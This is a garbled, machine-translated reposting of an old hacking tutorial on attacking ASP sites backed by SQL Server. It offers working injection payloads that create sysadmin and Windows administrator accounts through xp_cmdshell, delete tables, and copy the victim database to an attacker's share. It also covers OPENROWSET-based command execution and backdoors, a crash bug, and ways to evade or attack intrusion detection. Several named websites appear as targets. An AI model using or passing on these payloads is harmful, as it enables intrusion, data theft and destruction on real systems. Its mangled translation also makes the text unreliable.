Some attacks in the SQL database

xiaoxiao2021-03-06  35

Simple invasion and rogue damage to the database, do an example with the sky

For many news, BBS and e-commerce websites use ASP SQL design, while writing ASP's programmers (there are many new graduation), so ASP SQL attack success rate

It is also relatively high. This type of attack method and NT version and the SQL version do not have much relationship, and there is no corresponding patch, because the vulnerability is caused by the programmer, and most of the most explain ASP compilation

On the book, the source code example has this vulnerability, in fact, only some legal ASP's requests for SQL, leave after the suffering! ??

This kind of attack method originated from the vulnerability of 'OR'1' = '1 (we call it as a vulnerability), this vulnerability, I think everyone should know, then, then, is; exec

SP_ADDLOGIN HAX (add a HAX user in the database), but this method is limited, first, the SQL Server account used by the ASP is an administrator, and the submission of the requested request

In the end of the entire SQL statement, because there are some programmers adopted Select * from news where id = ... and Topic = ... and .....??

This method requests the database, then if still used the above example, will it be ??

News.asp? id = 2; EXEC SP_ADDLOGIN HAX ??

Change into select * from news where id = 2; exec sp_addlogin Hax and topic = ... and ...????

The entire SQL statement has an AND and judgment in the stored procedure of sp_addlogin, the syntax error, your sp_addlogin naturally doesn't work normally, so try the following

law??

News.asp? id = 2; exec sp_addlogin Hax; - ??

The back-symbol turns the judgment statement after sp_addlogin to comment, so there is no syntax error, sp_addlogin is executed normally! ??

So let's use it together??

News.asp? id = 2; exec master.dbo.sp_addlogin Hax; - ??

News.asp? id = 2; exec master.dbo.sp_password null, Hax, Hax; - ??

News.asp? id = 2; exec master.dbo.sp_addsrvrolemember sysadmin Hax; - ??

News.asp? id = 2; exec master.dbo.xp_cmdshell 'net user Hax Hax / Workstations: * / Times: All / Passwordchg: Yes / PasswordReq: YES

/ ACTIVE: YES / Add '; - ??

News.asp? id = 2; exec master.dbo.xp_cmdshell 'net localgroup administrators Hax / add'; - ??

In this way, you have left the HAX administrator account in his database and system ??

Of course, the prerequisites are ASPs to use the administrator account, so don't tried the virtual space, there will be no such loopholes. ??

We will discuss later, if the other ASP is not using the SQL administrator account, how we invade, of course, will also involve the invasion of the 1433 port??

Of course, everyone can try to look at the ID = 2, add a 'symbol, mainly watching the other party ASP how to write ??

??

Let's talk about how we do when the SQL account used by the ASP program is not administrator. ??

You like the homepage of the Tianron, there is news content, as follows: ??

http://www.talentit.com.cn/news/news-2.asp?newid=117 ??

You can try it.

Http://www.talent.com.cn/news/news-2.asp?newid=117 ;select 123; - ??

Oh, the report is wrong, SELECT 123 error, obvious, Tianle new ASP ends with the 'number after the newID variable??

So try

http://www.talentitit.com.cn/news/news-2.asp?newid=117'; delete news; - ??

Haha, I think as long as the name is guess, the news base is deleted ??

Usually the SQL account for ASP is not an administrator, it will be an Owner of a database, at least for this library has high management privileges ??

But we don't know how the library is? Take a look at the db_name () function ??

Open your Query Analyzer, take a look at Print DB_Name (), huh, the current database name is coming out??

Pushing in times, as follows: declare @A sysname; set @ a = db_name (); backup Database @a to disk = 'your ip Your shared directory Bak.dat', name = 'test'; - ??

Oh, his current database is backed up on your hard drive. Let's understand it next to everyone.?

Similarly, this method can find the other party's SQL IP ??

First installed a firewall, open ICMP and 139TCP and 445TCP warning tips ??

Then try seeing news.asp? Id = 2; exec master.dbo.xp_cmdshell 'ping your ip' ??

If the firewall prompts someone ping you, then because it can be sure that the other party's ASP is SQL administrator privilege, it also determines the exact location of the other's SQL Server, because many large

A little website considers performance, will be a web service and database, when the other party does not see the source code, I think there is only this method to locate the other side's SQL Server bit.

What is it ??

So, if the other ASP does not have SQL administrator privileges, we can't call XP_cmdshell, what should I do? ??

Don't worry, try see this news.asp? Id = 2; declare @A; set @ a = db_name (); backup database @a to disk = 'your ip Your shared directory Bak.dat'

Name = 'test'; - ??

Oh, your firewall should warn, some people connect to your 445 or 139 (Win9 port, so that the other's SQL IP can also expose??

So what should we do if the other party is not Owner? Next time I will tell you a better way. ??

In fact, Backuo Database is a bit exaggerated to your hard drive. If the other database is very large, you are dialing online, huh, huh, advise you not try, it is difficult to successfully transfer??

Next time we will talk about how to deceive IDS to execute the ASP SQL invading ??

Some good IDs have started to monitor the keywords of XP_cmdshell ??

Ok, comrades see it next time??

All the above URLs I hope that you will submit through VBScript because the browser's address bar will block some special characters, so your command cannot be fully transferred ??

Window.location.herf = URL

Supplement: This issue has also been raised on the online network, but only some simple XP_cmdshell call limit is very large, in fact, there are many places worth in-depth, such as

Www.guosen.com.cn. There is this problem with the national agency certificate, and they use the three-story structure of the MS to use the XP_cmdshell practice, and the string will be filtered, but

I tried, using SQL's heterogeneous requests can still open the Telnet service and the Administrators group on the other's machine! Since the other firewall is very checker, checkpoint datagram

Only open the 80-port, therefore, if you want to get his database structure is more difficult, but there is still a way to do: P

By the way, please pay attention to SQLOLEDB, DB_NAME, OPENROWSET, OpenDataSource These system functions When the ASP's SQLServer account is just a normal user, they will

Very useful!

??

[H4] SQL Server new vulnerabilities and some breakthroughs [/ h4]

Below I will talk about some SQLServer new bugs, although I have been working hard, of course, I have a little lucky component, I can find that I don't dare to enjoy alone, take it out, please

Identification, of course, some masters have long been known, after all, I have been in contact with SQLServer for less than 1 year: P

1. About OpenRowSet and OpenDataSource

Maybe this skill has already been there, that is, using OpenRowSet to send a local command.

Usually our usage is (including MSDN's list) as follows

Select * from OpenRowSet ('sqloledb', 'myserver'; 'sa'; '', 'SELECT * from Table')

It can be seen (even in the literal sense) OpenRowset is just as a quick remote database access, it must be followed in SELECT, that is, if you need to return a recordset

So can we use it to call XP_CMDSHELL? The answer is yes!

Select * from OpenRowSet ('SQLOLEDB', 'Server'; 'SA'; '', 'Set FMTONLY OFF EXEC MASTER.DBO.XP_CMDSHELL' 'DIR C: /' ')

Must add the set fmtonly off to block the default return to the settings of the column information, so the output collection returned by xp_cmdshell will be submitted to the front Select display, if adopted

Default settings, will return empty sets, resulting in select errors, and commands cannot be executed.

So if we want to call sp_addlogin, he will not return any collection as XP_cmdshell, we can't rely on FMTONLY, you can do the following

Select * from OpenRowSet ('sqloledb', 'Server'; 'Sa'; '', 'SELECT' '' '' EXEC MASTER.DBO.SP_ADDLOGIN HECTIC '

In this way, the command will return at least the collection of SELECT 'OK!', Your machine chamber shows OK! And the other's database will also add a hectic account, that is, we use Select 'OK!' To return to set deception The local SELECT request is that the command can perform normally, and the pendant sp_addsrvrolemember and OpenDataSource can also do this! Until

This method is really useful, everyone thinks,: P

2. Problems about MSDasql twice

I don't know if you have tried to connect the remote database with MSDasql. Of course, this API must be the administrator of SQL Server to call, so as follows

SELECT * from OpenRowSet ('msdasql', 'driver = {SQL

Server}; server = server; address = server, 1433; uid = sa; pwd =; database = master; network = dbmssocn ',' SELECT * from Table1 Select *

Table2 ')

When the number of fields of table1 and table2 is different, you will find that the other's SQLServer crashes, and even local connections will fail, and system resources are occupied, and they will kill with pskill.

After the SQLServer process, if the machine is not restarted, SQL Server does not start normally, or often illegal operations, I just happen to find this bug, I haven't been there.

Talking, and very strange is that this phenomenon only appears on MSDasql. Sqloledb has no such problem. It seems that the problem is not that the number of collections and the number of returns do not match, because

It is also a problem with MSDasql itself, for specific reasons, let's study together: P

3. Terrible back door

I used to see someone on the Internet, say that the latter door stayed in SQL Server can be done by adding Triger, Jobs or rewriting sp_addlogin and sp_addsrvrolemember, and these methods are of course feasible.

But it is easy to find. I don't know if you have thought about the local connection map of SQLOLOLDB. Oh, such as you have executed with SQL Server administrator account on the other side's SQL Server.

Down command

Select * from openrowset ('sqloledb', 'trusted_connection = yes; data source = hectic', 'set fmtonly off exec master..xp_cmdshell

'' DIR C: / '' ')

This creates a local connection mapping called hectic on the other side's SQL Server, as long as SQL Server does not restart, this map will always exist, at least I don't know now.

What is the connection map placed by others?

Ok, after the above command runs, you will find that even if SQL Server doesn't have any permissions, you can run the same as you can pass! And the permissions are

Localsystem! (Default installation) huh! This method can be used to leave a back door with SQL Server that has been invaded by administrator privileges.

The above method passes on SQL Server2000 SQLServer 200SP1!

* There is another guess. I don't know if you haven't pay more attention to the two DSNs included with Windows. One is the LocalServer one is MSQi. These two are the local administrator account connection SQLServer, if the other party's SQL Server is By starting with custom Power User, then SA's permissions are the same as Power User, but it is difficult to make a big, but

We pass the following command

SELECT * from OpenRowSet ('msdasql', 'DSN = Locaserver; trusted_connection = yes', 'set fmtonly off exec master..xp_cmdshell' DIR

C: / '') should be able to connect to local SQLServer using LocalServer's administrator account and then perform local commands with this account permission. This is, I think it should be able to break through SA.

Power User permissions. The problem now is that SQLOLEDB cannot call the DSN connection, and the MSDASQL non-administrator does not call, so I am looking for a method of guest call MSDasql,

If someone knows how this bug breaks through, or there is a new idea, we can discuss together, if this issue can be successfully used by Guest, it will be a very serious security vulnerability.

Because any SQL statement mentioned earlier can be submitted to the other party ASP to help us execute: P

[H4] Use T-SQL to deceive IDS or attack IDs [/ h4]

The current IDS has become more and smarter.

Some IDs have added XP_CMDSHELL SP_ADDLOGIN monitoring

However, after all, there is no presence of artificial intelligence, this surveillance always has a sense of deception.

Let me talk about deception IDS:

Ids Since we monitor the XP_cmdshell keyword, then we can do this

Declare @a sysname set @ a = "xp _" "cmdshell" EXEC @a 'DIR C: /'

This code is like everyone understands, and XP_cmdshell is a Store Procedure there is a ID number in the Master library, fixed, we can also do this.

Suppose this id = 988456

Declare @a sysname select @ a = name from sysobjects where id = 988456 exec @a 'DIR C: /'

Of course

Declare @a sysname select @ a = name from sysobjects where id = 988455 1 exec @a 'DIR C: /'

This approach is arranged, and IDS can't do it all over.

Similarly, sp_addlogin can also do this

Let's talk about attack IDs:

Because the amount of IDS is large, day is usually backed up to regular database, such as SQL Server

If you use an old RecordSet.Addnew approach, it will seriously affect the performance of the IDS, because T-SQL requests are made through ADO, not only high efficiency, but also some work can be handed over to SQL Server

Go to do

Usually the program will write so

INSERT TABLE VALUES ('Day to Content', ...)

So I think about it, if used

Temp ') EXEC XP_CMDSHELL' DIR C: / '-

Change it after submission

Insert Table Values ​​('Day to Content' .... 'Temp') Exec XP_cmdshell 'DIR C: /' - ') This, XP_cmdshell can run in the IDS database :)

Of course, IDS is a sniper, he will catch all the news, while the browser is submitted to change the space into% 20

Therefore,% 20 will be submitted to SQL Server so that your command cannot be executed.

The only way is

INSERT / ** / TABLE / ** / VALUES ('Day to Content' .... 'Temp') / ** / EXEC / ** / XP_CMDSHELL / ** / 'DIR C: /' / ** / - - ')

Use / ** / instead of space to do spacer, so your T-SQL can execute within IDs database

It is also possible to use other statements, you can destroy, back up the IDS database to your shared directory.

Ha ha

In fact, the principles of this method are the same, just turning spaces / ** /

Original ASP is a SELECT statement, then use 'to block

Now ids uses insert statement, then use ') shield

Ok, many other new invasive statements can slowly think, the best test tool is Query Analyzer.

转载请注明原文地址:https://www.9cbs.com/read-116293.html

New Post(0)